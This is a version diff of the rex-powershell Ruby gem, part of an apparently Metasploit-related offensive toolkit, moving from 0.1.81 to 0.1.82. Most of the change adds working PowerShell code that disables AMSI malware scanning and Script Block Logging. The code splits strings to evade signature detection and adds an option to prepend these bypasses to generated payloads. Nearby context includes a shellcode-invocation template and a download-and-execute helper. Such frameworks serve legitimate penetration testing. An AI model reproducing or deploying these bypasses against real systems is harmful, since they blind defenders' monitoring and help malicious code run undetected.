rex-powershell 0.1.81 → 0.1.82

Sign up to get free protection for your applications and to get access to all the features.
checksums.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  ---
2
2
  SHA1:
3
- metadata.gz: 52aa59edea1a94ba2fc19092005bab64aeac69ea
4
- data.tar.gz: 7d565ada14c7580f8848dca04d4966dc2b666191
3
+ metadata.gz: 5050ad40885d40a43ab8756d73c94880b17d7666
4
+ data.tar.gz: 9a4d35a597ab6a991f2be28a403d216e733a124e
5
5
  SHA512:
6
- metadata.gz: da9f7797acb625600d51a28044d700043d7a219c12f60a289c9b7c312cab5e6852169058bcc06e70fd450c379ad98196800a7c6690cdba579267dc19e175ebfa
7
- data.tar.gz: 6d6b7ecc58698b0fcb39a765b15926dfca6dbfa33e398148faffb9d71a122079f24ed613c6821f26981f2802e74bf2edf3c2bac8631e2ad5c81f9ed682dbf6bf
6
+ metadata.gz: 03c15cfbddd8dc75c2f55e411285798911c9f286c50288412b1a51971036056f311c89e1099be7ea1dd4607139479099e7dd56e181fe6ee0de82ff158cec447a
7
+ data.tar.gz: 9dd8103e33b749ef55907ae5cc216e12814352480713056ea2fac2befbcd6630ddd096cd0cb3e18a0b6825c4bb6e8861a1566be2de1c2ce1757544781bdd2f78
Binary file
data.tar.gz.sig CHANGED
Binary file
@@ -64,4 +64,4 @@ $%{var_args}[2] = $%{var_sc}.Length
64
64
 
65
65
  $%{var_src_meth}.Invoke($null, $%{var_args})
66
66
 
67
- $%{var_tgt_meth}.Invoke($null, @(0x11112222))
67
+ $%{var_tgt_meth}.Invoke($null, @(0x11112222))
@@ -316,6 +316,10 @@ EOS
316
316
  end
317
317
  end
318
318
 
319
+ if opts[:prepend_protections_bypass]
320
+ psh_payload = Rex::Powershell::PshMethods.bypass_powershell_protections << ";#{psh_payload}"
321
+ end
322
+
319
323
  compressed_payload = compress_script(psh_payload, nil, opts)
320
324
  encoded_payload = encode_script(psh_payload, opts)
321
325
 
@@ -85,6 +85,53 @@ module Powershell
85
85
  '[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};'
86
86
  end
87
87
 
88
+ #
89
+ # Return mattifestation's AMSI bypass
90
+ #
91
+ # @return [String] PowerShell code to bypass AMSI
92
+ def self.bypass_amsi()
93
+ %q{
94
+ $Ref=[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils');
95
+ $Ref.GetField('amsiIn'+'itFailed','NonPublic,Static').SetValue($null,$true);
96
+ }
97
+ end
98
+
99
+ #
100
+ # Return cobbr's Script Block Logging bypass
101
+ #
102
+ # @return [String] PowerShell code to bypass Script Block Logging
103
+ def self.bypass_script_log()
104
+ %q{
105
+ $GPF=[ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings','N'+'onPublic,Static');
106
+ If($GPF){
107
+ $GPC=$GPF.GetValue($null);
108
+ If($GPC['ScriptB'+'lockLogging']){
109
+ $GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;
110
+ $GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockInvocationLogging']=0
111
+ }
112
+ $val=[Collections.Generic.Dictionary[string,System.Object]]::new();
113
+ $val.Add('EnableScriptB'+'lockLogging',0);
114
+ $val.Add('EnableScriptB'+'lockInvocationLogging',0);
115
+ $GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$val
116
+ } Else {
117
+ [ScriptBlock].GetField('signatures','N'+'onPublic,Static').SetValue($null,(New-Object Collections.Generic.HashSet[string]))
118
+ }
119
+ }
120
+ end
121
+
122
+ #
123
+ # Return all bypasses checking if PowerShell version > 3
124
+ #
125
+ # @return [String] PowerShell code to disable PowerShell Built-In Protections
126
+ def self.bypass_powershell_protections()
127
+ %Q{
128
+ If($PSVersionTable.PSVersion.Major -ge 3){
129
+ #{self.bypass_script_log}
130
+ #{self.bypass_amsi}
131
+ }
132
+ }
133
+ end
134
+
88
135
  #
89
136
  # Download and execute string via HTTP
90
137
  #
@@ -1,5 +1,5 @@
1
1
  module Rex
2
2
  module Powershell
3
- VERSION = "0.1.81"
3
+ VERSION = "0.1.82"
4
4
  end
5
5
  end
metadata CHANGED
@@ -1,7 +1,7 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: rex-powershell
3
3
  version: !ruby/object:Gem::Version
4
- version: 0.1.81
4
+ version: 0.1.82
5
5
  platform: ruby
6
6
  authors:
7
7
  - David 'thelightcosine' Maloney
metadata.gz.sig CHANGED
Binary file